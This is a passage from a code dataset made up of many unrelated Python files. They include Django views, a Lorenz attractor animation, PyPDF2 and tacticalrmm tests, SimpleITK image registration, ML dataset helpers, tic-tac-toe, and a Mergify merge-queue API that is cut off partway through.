.filter(Q(project__user=request.user) &\n Q(status__iexact=q))\n else:\n filtered_applicants = self.model.objects \\\n .filter(project__user=request.user)\n\n my_projects = models.Project.objects \\\n .filter(user=request.user)\n my_proj_needs = models.Position.objects \\\n .filter(Q(project__user=request.user)).distinct()\n\n return render(request, self.template_name, {\n 'q': q,\n 'my_projects': my_projects,\n 'my_proj_needs': my_proj_needs,\n 'filtered_applicants': filtered_applicants,\n 'form_status': form_status,\n 'redirect': redirect})\n\n\nclass ApplicantEditView(\n PermissionRequiredMixin, LoginRequiredMixin,\n mixins.ApplicationMustBeForAuthorMixin,\n UpdateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def post(self, request, *args, **kwargs):\n redirect_path = request.GET.get('redirect', '')\n q = request.GET.get('q', '')\n\n applicant = self.model.objects.get(pk=self.kwargs.get('pk'))\n applicant.status = request.POST['status']\n applicant.save()\n\n if applicant.status == 'Accepted':\n notify.send(\n request.user,\n recipient=applicant.user,\n verb=(\n 'Your application for position {} for project {} has been '\n 'accepted'.format(\n applicant.position.name, applicant.project.title)))\n elif applicant.status == 'Rejected':\n notify.send(\n request.user,\n recipient=applicant.user,\n verb=(\n 'Your application for position {} for project {} has been '\n 'rejected'.format(\n applicant.position.name, applicant.project.title)))\n\n if redirect:\n path = 'applications_' + redirect_path\n else:\n path = 'applications'\n\n if q:\n return redirect(reverse(path) + '?q=' + q)\n\n return redirect(reverse('applications'))\n\n\n# -----\n# Search\n# -----\nclass SearchView(TemplateView):\n model = models.Project\n template_name = 'main/search.html'\n\n def get(self, request):\n search_term = request.GET.get('q', '')\n\n projects = self.model.objects \\\n .prefetch_related('positions') \\\n .filter(\n Q(title__icontains=search_term) |\n Q(description__icontains=search_term)) \\\n .order_by('title')\n project_needs = models.Position.objects \\\n .order_by('name').distinct()\n\n return render(request, self.template_name, {\n 'projects': projects,\n 'search_term': search_term,\n 'project_needs': project_needs})","sub_path":"project/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"493606036","text":"import openfst_python as fst\n\nacceptor = []\ns = 1\nf = fst.Fst()\n\nletters = list('rosebud')\n\nfor i in range(0, len(letters)):\n print(\n f.add_arc(\n src=s, dst=s+1, src_sym=letters[i], dst_sym=letters[i], w=0))\n s += 1\n if i == len(letters) - 1:\n print(\n f. add_arc(\n src=s, dst=0, src_sym=EPS, dst_sym=EPS, w=0))\n\nprint(0)\n","sub_path":"Lab1/.ipynb_checkpoints/create_fst-checkpoint.py","file_name":"create_fst-checkpoint.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"333786446","text":"# coding: utf-8\n#\n# Copyright 2019 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Stores various constants for Oppia release.\"\"\"\n\nfrom __future__ import absolute_import # pylint: disable=import-only-modules\nfrom __future__ import unicode_literals # pylint: disable=import-only-modules\n\nimport os\n\n# Affirmative user confirmations.\nAFFIRMATIVE_CONFIRMATIONS = ['y', 'ye', 'yes']\n\n# PyGithub can fetch milestone only by using the milestone number. Milestones\n# are numbered sequentially as they are created and the number remains fixed.\n# The number for blocking_bugs milestone is 39 which is used to fetch this\n# milestone.\nBLOCKING_BUG_MILESTONE_NUMBER = 39\n\nLABEL_FOR_CURRENT_RELEASE_PRS = 'PR: for current release'\nLABEL_FOR_RELEASED_PRS = 'PR: released'\n\n# The path for generating release_summary.md file for the current release.\nRELEASE_SUMMARY_FILEPATH = os.path.join(\n os.getcwd(), os.pardir, 'release_summary.md')\n\nREMOTE_URL = 'git@github.com:oppia/oppia.git'\n\nRELEASE_BRANCH_TYPE = 'release'\nHOTFIX_BRANCH_TYPE = 'hotfix'\n","sub_path":"release_constants.py","file_name":"release_constants.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"53261258","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 22:22:45 2016\n\n@author: AF\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\n\ndef lorenz(x, y, z, s=10, r=25, b=8.0/3):\n x_dot = s*(y - x)\n y_dot = r*x - y - x*z\n z_dot = x*y - b*z\n return x_dot, y_dot, z_dot\n\ndt = 0.01\nstepCnt = 10000\n\n# Need one more for the initial values\nxs = np.empty((stepCnt + 1,))\nys = np.empty((stepCnt + 1,))\nzs = np.empty((stepCnt + 1,))\n\n'''x_plot = []\ny_plot = []\nz_plot = []'''\n\n# Setting initial values\nxs[0], ys[0], zs[0] = (1.0, 0.0, 0.0)\n\n# Stepping through \"time\".\nfor i in range(stepCnt):\n # Derivatives of the X, Y, Z state\n x_dot, y_dot, z_dot = lorenz(xs[i], ys[i], zs[i])\n xs[i + 1] = xs[i] + (x_dot * dt)\n ys[i + 1] = ys[i] + (y_dot * dt)\n zs[i + 1] = zs[i] + (z_dot * dt)\n''' if xs[i]*xs[i+1]<0.0:\n r = np.abs(xs[i+1]/xs[i])\n y_plot.append((ys[i]*r+ys[i+1])/(1+r))\n z_plot.append((zs[i]*r+zs[i+1])/(1+r)) '''\n \n\nfig = plt.figure(figsize = (8,6))\nfont = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 16}\nax = plt.axes(xlim=(-15, 15), ylim=(0, 35))\nline, = ax.plot([], [], 'k.')\n\ndef init():\n line.set_data([], [])\n return line,\n\ndef animate(i):\n y_plot = []\n z_plot = []\n x_p = i/10.0 - 10.0\n plt.xlabel('y', fontdict=font)\n plt.ylabel('z', fontdict=font)\n for j in range(stepCnt):\n if (xs[j]-x_p)*(xs[j+1]-x_p)<0.0:\n r = np.abs((xs[j+1]-x_p)/(xs[j]-x_p))\n y_plot.append((ys[j]*r+ys[j+1])/(1+r))\n z_plot.append((zs[j]*r+zs[j+1])/(1+r))\n line.set_data(y_plot,z_plot)\n return line,\n \n'''y_plot = []\nz_plot = []\nfor j in range(stepCnt):\n if xs[j]*xs[j+1]<0.0:\n r = np.abs(xs[j+1]/xs[j])\n y_plot.append((ys[j]*r+ys[j+1])/(1+r))\n z_plot.append((zs[j]*r+zs[j+1])/(1+r))\nplt.scatter(y_plot,z_plot)''' \n\nanim = animation.FuncAnimation(fig, animate, init_func=init, frames=200, interval=20, blit=True)\nplt.show()\nanim.save('chapter3_butterfly.gif', fps=20, writer='Feng_Chen')","sub_path":"Exercise/Chapter 3/chapter3_lorenz_model.py","file_name":"chapter3_lorenz_model.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"388376783","text":"\n\nfrom xai.brain.wordbase.nouns._coverlet import _COVERLET\n\n#calss header\nclass _COVERLETS(_COVERLET, ):\n\tdef __init__(self,): \n\t\t_COVERLET.__init__(self)\n\t\tself.name = \"COVERLETS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"coverlet\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_coverlets.py","file_name":"_coverlets.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"539519716","text":"import os\nimport binascii\nimport sys\n\nimport PyPDF2\n\nTESTS_ROOT = os.path.abspath(os.path.dirname(__file__))\nPROJECT_ROOT = os.path.dirname(TESTS_ROOT)\nRESOURCE_ROOT = os.path.join(PROJECT_ROOT, \"Resources\")\n\nsys.path.append(PROJECT_ROOT)\n\n\ndef test_merge():\n pdf_path = os.path.join(RESOURCE_ROOT, \"crazyones.pdf\")\n outline = os.path.join(RESOURCE_ROOT, \"pdflatex-outline.pdf\")\n pdf_forms = os.path.join(RESOURCE_ROOT, \"pdflatex-forms.pdf\")\n\n file_merger = PyPDF2.PdfFileMerger()\n\n # string path:\n file_merger.append(pdf_path)\n file_merger.append(outline)\n file_merger.append(pdf_path, pages=PyPDF2.pagerange.PageRange(slice(0, 0)))\n file_merger.append(pdf_forms)\n\n # PdfFileReader object:\n file_merger.append(PyPDF2.PdfFileReader(pdf_path, \"rb\"))\n\n # Is merging encrypted files broken?\n # encrypted = os.path.join(RESOURCE_ROOT, \"libreoffice-writer-password.pdf\")\n # reader = PyPDF2.PdfFileReader(pdf_path, \"rb\")\n # reader.decrypt(\"openpassword\")\n # file_merger.append(reader)\n\n # File handle\n fh = open(pdf_path, \"rb\")\n file_merger.append(fh)\n\n file_merger.addBookmark(\"A bookmark\", 0)\n\n file_merger.write(\"dont_commit_merged.pdf\")\n file_merger.close()\n","sub_path":"Tests/test_merger.py","file_name":"test_merger.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358545655","text":"from __future__ import print_function\n\nimport SimpleITK as sitk\nfrom PIL import Image\nimport sys\nimport os\n\n\ndef command_iteration(method):\n print(\"{0:3} = {1:10.5f}\".format(method.GetOptimizerIteration(),\n method.GetMetricValue()))\n\n\nfixed_file = '../images/fixedImage.png'\nmoving_file = '../images/movingImage.png'\n\nfixed = sitk.ReadImage(fixed_file, sitk.sitkFloat32)\n\nmoving = sitk.ReadImage(moving_file, sitk.sitkFloat32)\n\ntransformDomainMeshSize = [8]*moving.GetDimension()\ntx = sitk.BSplineTransformInitializer(fixed, transformDomainMeshSize)\n\nprint(\"Initial Parameters:\")\nprint(tx.GetParameters())\n\nR = sitk.ImageRegistrationMethod()\nR.SetMetricAsCorrelation()\n\nR.SetOptimizerAsLBFGSB(gradientConvergenceTolerance=1e-5,\n numberOfIterations=100,\n maximumNumberOfCorrections=5,\n maximumNumberOfFunctionEvaluations=1000,\n costFunctionConvergenceFactor=1e+7)\nR.SetInitialTransform(tx, True)\nR.SetInterpolator(sitk.sitkLinear)\n\nR.AddCommand(sitk.sitkIterationEvent, lambda: command_iteration(R))\n\noutTx = R.Execute(fixed, moving)\n\nprint(\"-------\")\nprint(outTx)\nprint(\"Optimizer stop condition: {0}\".format(R.GetOptimizerStopConditionDescription()))\nprint(\" Iteration: {0}\".format(R.GetOptimizerIteration()))\nprint(\" Metric value: {0}\".format(R.GetMetricValue()))\n\n# sitk.WriteTransform(outTx, sys.argv[3])\n\nif not \"SITK_NOSHOW\" in os.environ:\n\n resampler = sitk.ResampleImageFilter()\n resampler.SetReferenceImage(fixed)\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetDefaultPixelValue(100)\n resampler.SetTransform(outTx)\n\n out = resampler.Execute(moving)\n simg1 = sitk.Cast(sitk.RescaleIntensity(fixed), sitk.sitkUInt8)\n simg2 = sitk.Cast(sitk.RescaleIntensity(out), sitk.sitkUInt8)\n cimg = sitk.Compose(simg1, simg2, simg1//2.+simg2//2.)\n\n nda = sitk.GetArrayViewFromImage(cimg)\n my_pil = Image.fromarray(nda)\n my_pil.show()\n\n # sitk.Show(cimg, \"ImageRegistration1 Composition\")\n\n","sub_path":"Learning_projects/SimpleITK_pruebas/pruebas/ImageRegistrationMethodBSpline1.py","file_name":"ImageRegistrationMethodBSpline1.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"80385306","text":"from tacticalrmm.test import TacticalTestCase\nfrom core.tasks import core_maintenance_tasks\nfrom unittest.mock import patch\nfrom model_bakery import baker, seq\n\n\nclass TestCoreTasks(TacticalTestCase):\n def setUp(self):\n self.setup_coresettings()\n self.authenticate()\n\n def test_core_maintenance_tasks(self):\n task = core_maintenance_tasks.s().apply()\n self.assertEqual(task.state, \"SUCCESS\")\n\n def test_dashboard_info(self):\n url = \"/core/dashinfo/\"\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n\n self.check_not_authenticated(\"get\", url)\n\n def test_vue_version(self):\n url = \"/core/version/\"\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n\n self.check_not_authenticated(\"get\", url)\n\n def test_get_core_settings(self):\n url = \"/core/getcoresettings/\"\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n\n self.check_not_authenticated(\"get\", url)\n\n @patch(\"autotasks.tasks.remove_orphaned_win_tasks.delay\")\n def test_ui_maintenance_actions(self, remove_orphaned_win_tasks):\n url = \"/core/servermaintenance/\"\n\n agents = baker.make_recipe(\"agents.online_agent\", _quantity=3)\n\n # test with empty data\n r = self.client.post(url, {})\n self.assertEqual(r.status_code, 400)\n\n # test with invalid action\n data = {\"action\": \"invalid_action\"}\n\n r = self.client.post(url, data)\n self.assertEqual(r.status_code, 400)\n\n # test reload nats action\n data = {\"action\": \"reload_nats\"}\n r = self.client.post(url, data)\n self.assertEqual(r.status_code, 200)\n\n # test prune db with no tables\n data = {\"action\": \"prune_db\"}\n r = self.client.post(url, data)\n self.assertEqual(r.status_code, 400)\n\n # test prune db with tables\n data = {\n \"action\": \"prune_db\",\n \"prune_tables\": [\"audit_logs\", \"agent_outages\", \"pending_actions\"],\n }\n r = self.client.post(url, data)\n self.assertEqual(r.status_code, 200)\n\n # test remove orphaned tasks\n data = {\"action\": \"rm_orphaned_tasks\"}\n r = self.client.post(url, data)\n self.assertEqual(r.status_code, 200)\n remove_orphaned_win_tasks.assert_called()\n\n self.check_not_authenticated(\"post\", url)\n","sub_path":"api/tacticalrmm/core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"330787058","text":"import random\n\nrandom.random() # >= 0 < 1.0\n\n# Con rango (numeros flotantes)\nrandom.uniform(1,10) # >= 1 < 10\n\n# Con rango, numeros enteros\nrandom.randrange(10) # >= 0 y < 10\n\nrandom.randrange(0,101)\n\n# Con rangos y multiplos de 2\nrandom.randrange(0,101,2)\n\n\nc = \"Hola Mundo\"\nrandom.choice(c) # Elige una cadena aleatoria\n\nl = [1,2,3,4,5]\nrandom.choice(l)\n\n# Baraja elementos\nrandom.shuffle(l)\n\n# Escoge una muestra de dos elementos\nrandom.sample(l,2)\n\n","sub_path":"modulos_paquetes/modulo_random.py","file_name":"modulo_random.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"93529525","text":"import os\nimport tarfile\nimport urllib.request\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport h5py\n\ndef is_png(path):\n return os.path.splitext(path)[1] == \".png\"\n\ndef download_dataset(url):\n file_name,_=os.path.splitext(os.path.basename(url))\n full_path=os.path.join(os.getcwd(),\"storage\", file_name)\n\n if not os.path.exists(full_path):\n urllib.request.urlretrieve(url,filename=full_path)\n\n return full_path\n\ndef show_directories(path):\n with tarfile.open(path,\"r\") as tar:\n for name in tar.getnames():\n if not is_png(name):\n print(name)\n\ndef extract_dataset(path):\n dir_name=\"dataset_{}\".format(os.path.basename(path).split(\".\")[0])\n dir_path=os.path.join(os.path.dirname(path), dir_name)\n\n if not os.path.exists(dir_path):\n with tarfile.open(path,\"r\") as tar:\n tar.extractall(dir_path) \n \n return dir_path\n\ndef read_dataset(path,classes,img_width,img_height):\n n=img_height*img_width\n\n X=[]\n Y=[]\n\n for root, _, files in os.walk(path):\n for file in files:\n try:\n im=mpimg.imread(os.path.join(root, file))\n X.append(im.reshape(1,n).T)\n\n dir_name=os.path.basename(root)\n Y.append(classes.index(dir_name))\n except:\n pass\n\n m=len(X)\n X=np.array(X).T.reshape((n,m))\n Y=np.array(Y).T.reshape((1,m))\n\n return X,Y\n\ndef show_images(X,Y,classes,img_height,img_width):\n m=X.shape[1]\n rand_index=np.random.randint(0,m,25)\n\n plt.figure(figsize=(10,10))\n for i in range(len(rand_index)):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(X[:,rand_index[i]].reshape(img_height,img_width),cmap=plt.cm.binary)\n plt.xlabel(classes[Y[0,rand_index[i]]])\n plt.show()\n\ndef show_percentages(Y,classes):\n total=Y.shape[1]\n for i in range(len(classes)):\n count=np.count_nonzero(Y==i)\n print(\"{0} : {1:.2f}%\".format(classes[i],count/total*100))\n\ndef split_dataset(X,Y,train_size, valid_size,test_size): \n train_index=train_size\n valid_index=train_index+valid_size\n test_index=valid_index+test_size\n\n p=np.random.permutation(X.shape[1])\n\n X_split=np.hsplit(X[:,p], [train_index,valid_index,test_index])\n Y_split=np.hsplit(Y[:,p], [train_index,valid_index,test_index])\n return X_split[0],X_split[1],X_split[2],Y_split[0],Y_split[1],Y_split[2]\n\ndef get_files(path):\n file_list=[]\n for root, _, files in os.walk(path):\n for file in files:\n file_list.append(os.path.join(root, file))\n \n return file_list\n\n\ndef create_hdf5(path,classes,img_width,img_height):\n file_name=\"{}.hdf5\".format(os.path.basename(path))\n file_path=os.path.join(os.path.dirname(path), file_name)\n\n if os.path.exists(file_path):\n return file_path\n\n addrs = get_files(path)\n\n X_shape=(len(addrs),img_width,img_height)\n Y_shape=(len(addrs),1)\n\n\n\n with h5py.File(file_path, 'w') as hf:\n hf.create_dataset(\"X\",X_shape,np.float)\n hf.create_dataset(\"Y\",Y_shape,np.uint8)\n\n for i in range(X_shape[0]):\n try:\n im=mpimg.imread(addrs[i])\n hf[\"X\"][i,...]=im\n\n dir_name=os.path.basename(os.path.dirname(addrs[i]))\n hf[\"Y\"][i]=classes.index(dir_name)\n except:\n pass \n\n return file_path\n\ndef read_hdf5(path):\n with h5py.File(path, 'r') as hf:\n return np.array(hf[\"X\"]), np.array(hf[\"Y\"])","sub_path":"common/lab_common.py","file_name":"lab_common.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"227243441","text":"board = [['_','_','_'],\n ['_','_','_'],\n ['_','_','_']]\n\nsymbols = ['X', 'O']\nturn = 0\n\n# Prints the board\ndef print_board():\n for row in board:\n for col in row:\n print(col, end=' ')\n print()\n\n# Inserts a move at a given row & column\ndef make_move(row, col, symbol):\n board[row][col] = symbol\n\n# Returns true when the game is over \n# Note: Just a stub. Doesn't work yet\ndef is_game_over():\n return False\n\n# Alternates the turn between 0 and 1\ndef change_turn():\n global turn\n turn = (turn + 1) % 2\n\nwhile not is_game_over():\n # Print the board and whose turn it is\n print_board()\n print('Player {}'.format(turn+1))\n\n # Get the user input\n row_choice = int(input('Which row would you like to choose? '))\n col_choice = int(input('Which column would you like to choose? '))\n\n # Put their move on the board\n make_move(row_choice, col_choice, symbols[turn])\n\n # Next turn\n change_turn()","sub_path":"ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"42549094","text":"# -*- encoding: utf-8 -*-\n#\n# Copyright © 2021 Mergify SAS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nimport dataclasses\nimport datetime\nimport typing\n\nimport daiquiri\nimport fastapi\nimport pydantic\nfrom starlette.status import HTTP_204_NO_CONTENT\n\nfrom mergify_engine import context\nfrom mergify_engine import date\nfrom mergify_engine import github_types\nfrom mergify_engine import rules\nfrom mergify_engine import utils\nfrom mergify_engine.dashboard import application as application_mod\nfrom mergify_engine.queue import freeze\nfrom mergify_engine.queue import merge_train\nfrom mergify_engine.rules import get_mergify_config\nfrom mergify_engine.web import api\nfrom mergify_engine.web import redis\nfrom mergify_engine.web.api import security\n\n\nLOG = daiquiri.getLogger(__name__)\n\nrouter = fastapi.APIRouter(\n tags=[\"queues\"],\n dependencies=[\n fastapi.Depends(security.require_authentication),\n ],\n)\n\n\n@pydantic.dataclasses.dataclass\nclass Branch:\n name: github_types.GitHubRefType = dataclasses.field(\n metadata={\"description\": \"The name of the branch\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass SpeculativeCheckPullRequest:\n in_place: bool = dataclasses.field(\n metadata={\"description\": \"Whether the pull request has been checked in-place\"}\n )\n number: github_types.GitHubPullRequestNumber = dataclasses.field(\n metadata={\n \"description\": \"The number of the pull request used by the speculative check\"\n }\n )\n started_at: datetime.datetime = dataclasses.field(\n metadata={\n \"description\": \"The timestamp when the checks has started for this pull request\"\n }\n )\n ended_at: typing.Optional[datetime.datetime] = dataclasses.field(\n metadata={\n \"description\": \"The timestamp when the checks has ended for this pull request\"\n }\n )\n checks: typing.List[merge_train.QueueCheck] = dataclasses.field(\n metadata={\"description\": \"The list of pull request checks\"}\n )\n evaluated_conditions: typing.Optional[str] = dataclasses.field(\n metadata={\"description\": \"The queue rule conditions evaluation report\"}\n )\n state: merge_train.CheckStateT = dataclasses.field(\n metadata={\"description\": \"The global state of the checks\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass QueueRule:\n name: rules.QueueName = dataclasses.field(\n metadata={\"description\": \"The name of the queue rule\"}\n )\n\n config: rules.QueueConfig = dataclasses.field(\n metadata={\"description\": \"The configuration of the queue rule\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass PullRequestQueued:\n number: github_types.GitHubPullRequestNumber = dataclasses.field(\n metadata={\"description\": \"The number of the pull request\"}\n )\n\n position: int = dataclasses.field(\n metadata={\"description\": \"The position of the pull request in the queue\"}\n )\n\n priority: int = dataclasses.field(\n metadata={\"description\": \"The priority of this pull request\"}\n )\n queue_rule: QueueRule = dataclasses.field(\n metadata={\"description\": \"The queue rule associated to this pull request\"}\n )\n\n queued_at: datetime.datetime = dataclasses.field(\n metadata={\n \"description\": \"The timestamp when the pull requested has entered in the queue\"\n }\n )\n speculative_check_pull_request: typing.Optional[SpeculativeCheckPullRequest]\n\n\n@pydantic.dataclasses.dataclass\nclass Queue:\n branch: Branch = dataclasses.field(\n metadata={\"description\": \"The branch of this queue\"}\n )\n\n pull_requests: typing.List[PullRequestQueued] = dataclasses.field(\n default_factory=list,\n metadata={\"description\": \"The pull requests in this queue\"},\n )\n\n\n@pydantic.dataclasses.dataclass\nclass Queues:\n queues: typing.List[Queue] = dataclasses.field(\n default_factory=list, metadata={\"description\": \"The queues of the repository\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass QueueFreezePayload:\n reason: str = dataclasses.field(\n metadata={\"description\": \"The reason of the queue freeze\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass QueueFreeze:\n application_name: str = dataclasses.field(\n metadata={\"description\": \"Application name responsible for the freeze\"},\n )\n application_id: int = dataclasses.field(\n metadata={\"description\": \"Application ID responsible for the freeze\"},\n )\n name: str = dataclasses.field(\n default_factory=str, metadata={\"description\": \"Queue name\"}\n )\n reason: str = dataclasses.field(\n default_factory=str, metadata={\"description\": \"The reason of the queue freeze\"}\n )\n freeze_date: datetime.datetime = dataclasses.field(\n default_factory=date.utcnow,\n metadata={\"description\": \"The date and time of the freeze\"},\n )\n\n\n@pydantic.dataclasses.dataclass\nclass QueueFreezeResponse:\n queue_freezes: typing.List[QueueFreeze] = dataclasses.field(\n default_factory=list,\n metadata={\"description\": \"The frozen queues of the repository\"},\n )\n\n\n@router.get(\n \"/repos/{owner}/{repository}/queues\", # noqa: FS003\n summary=\"Get merge queues\",\n description=\"Get the list of pull requests queued in a merge queue of a repository\",\n response_model=Queues,\n responses={\n **api.default_responses, # type: ignore\n 404: {\"description\": \"Not found\"},\n 200: {\n \"content\": {\n \"application/json\": {\n \"example\": {\n \"queues\": [\n {\n \"branch\": {\"name\": \"main\"},\n \"pull_requests\": [\n {\n \"number\": 5678,\n \"position\": 1,\n \"priority\": 100,\n \"queue_rule\": {\n \"name\": \"default\",\n \"config\": {\n \"priority\": 100,\n \"batch_size\": 1,\n \"batch_max_wait_time\": 0,\n \"speculative_checks\": 2,\n \"allow_inplace_checks\": True,\n \"disallow_checks_interruption_from_queues\": [],\n \"checks_timeout\": 60,\n \"draft_bot_account\": \"\",\n },\n },\n \"speculative_check_pull_request\": {\n \"in_place\": True,\n \"number\": 5678,\n \"started_at\": \"2021-10-14T14:19:12+00:00\",\n \"ended_at\": \"2021-10-14T15:00:42+00:00\",\n \"checks\": [],\n \"evaluated_conditions\": \"\",\n \"state\": \"success\",\n },\n \"queued_at\": \"2021-10-14T14:19:12+00:00\",\n },\n {\n \"number\": 4242,\n \"position\": 1,\n \"priority\": 100,\n \"queue_rule\": {\n \"name\": \"default\",\n \"config\": {\n \"priority\": 100,\n \"batch_size\": 1,\n \"batch_max_wait_time\": 0,\n \"speculative_checks\": 2,\n \"allow_inplace_checks\": True,\n \"disallow_checks_interruption_from_queues\": [],\n \"checks_timeout\": 60,\n \"draft_bot_account\": \"\",\n },\n },\n \"speculative_check_pull_request\": {\n \"in_place\": False,\n \"number\": 7899,\n \"started_at\": \"2021-10-14T14:19:12+00:00\",\n \"ended_at\": \"2021-10-14T15:00:42+00:00\",\n \"checks\": [],\n \"evaluated_conditions\": \"\",\n \"state\": \"success\",\n },\n \"queued_at\": \"2021-10-14T14:19:12+00:00\",\n },\n ],\n }\n ]\n }\n }\n }\n },\n },\n)\nasync def repository_queues(\n owner: github_types.GitHubLogin = fastapi.Path( # noqa: B008\n ..., description=\"The owner of the repository\"\n ),\n repository: github_types.GitHubRepositoryName = fastapi.Path( # noqa: B008\n ..., description=\"The name of the repository\"\n ),\n redis_cache: utils.RedisCache = fastapi.Depends( # noqa: B008\n redis.get_redis_cache\n ),\n redis_queue: utils.RedisQueue = fastapi.Depends( # noqa: B008\n redis.get_redis_queue\n ),\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> Queues:\n queues = Queues()\n async for train in merge_train.Train.iter_trains(repository_ctxt):\n queue_rules = await train.get_queue_rules()\n if queue_rules is None:\n # The train is going the be deleted, so skip it.\n continue\n\n queue = Queue(Branch(train.ref))\n for position, (embarked_pull, car) in enumerate(train._iter_embarked_pulls()):\n if car is None:\n speculative_check_pull_request = None\n elif car.creation_state in [\"created\", \"updated\"]:\n if car.queue_pull_request_number is None:\n raise RuntimeError(\n f\"car state is {car.creation_state}, but queue_pull_request_number is None\"\n )\n speculative_check_pull_request = SpeculativeCheckPullRequest(\n in_place=car.creation_state == \"updated\",\n number=car.queue_pull_request_number,\n started_at=car.creation_date,\n ended_at=car.checks_ended_timestamp,\n state=car.checks_conclusion.value or \"pending\",\n checks=car.last_checks,\n evaluated_conditions=car.last_evaluated_conditions,\n )\n elif car.creation_state in (\"failed\", \"pending\"):\n speculative_check_pull_request = None\n else:\n raise RuntimeError(f\"Car creation state unknown: {car.creation_state}\")\n\n try:\n queue_rule = queue_rules[embarked_pull.config[\"name\"]]\n except KeyError:\n # This car is going to be deleted so skip it\n continue\n queue.pull_requests.append(\n PullRequestQueued(\n embarked_pull.user_pull_request_number,\n position,\n embarked_pull.config[\"priority\"],\n QueueRule(\n name=embarked_pull.config[\"name\"], config=queue_rule.config\n ),\n embarked_pull.queued_at,\n speculative_check_pull_request,\n )\n )\n\n queues.queues.append(queue)\n\n return queues\n\n\n@router.put(\n \"/repos/{owner}/{repository}/queue/{queue_name}/freeze\", # noqa: FS003\n summary=\"Freezes merge queue\",\n description=\"Freezes the merge of the requested queue and the queues following it\",\n response_model=QueueFreezeResponse,\n dependencies=[fastapi.Depends(security.check_subscription_feature_queue_freeze)],\n)\nasync def create_queue_freeze(\n queue_freeze_payload: QueueFreezePayload,\n application: application_mod.Application = fastapi.Depends( # noqa: B008\n security.get_application\n ),\n queue_name: rules.QueueName = fastapi.Path( # noqa: B008\n ..., description=\"The name of the queue\"\n ),\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> QueueFreezeResponse:\n\n if queue_freeze_payload.reason == \"\":\n queue_freeze_payload.reason = \"No freeze reason was specified.\"\n\n config_file = await repository_ctxt.get_mergify_config_file()\n if config_file is None:\n raise fastapi.HTTPException(\n status_code=404, detail=\"Mergify configuration file is missing.\"\n )\n\n config = get_mergify_config(config_file)\n queue_rules = config[\"queue_rules\"]\n if all(queue_name != rule.name for rule in queue_rules):\n raise fastapi.HTTPException(\n status_code=404, detail=f'The queue \"{queue_name}\" does not exists.'\n )\n\n qf = await freeze.QueueFreeze.get(repository_ctxt, queue_name)\n if qf is None:\n qf = freeze.QueueFreeze(\n repository=repository_ctxt,\n name=queue_name,\n reason=queue_freeze_payload.reason,\n application_name=application.name,\n application_id=application.id,\n freeze_date=date.utcnow(),\n )\n await qf.save()\n\n elif qf.reason != queue_freeze_payload.reason:\n qf.reason = queue_freeze_payload.reason\n await qf.save()\n\n return QueueFreezeResponse(\n queue_freezes=[\n QueueFreeze(\n name=qf.name,\n reason=qf.reason,\n application_name=qf.application_name,\n application_id=qf.application_id,\n 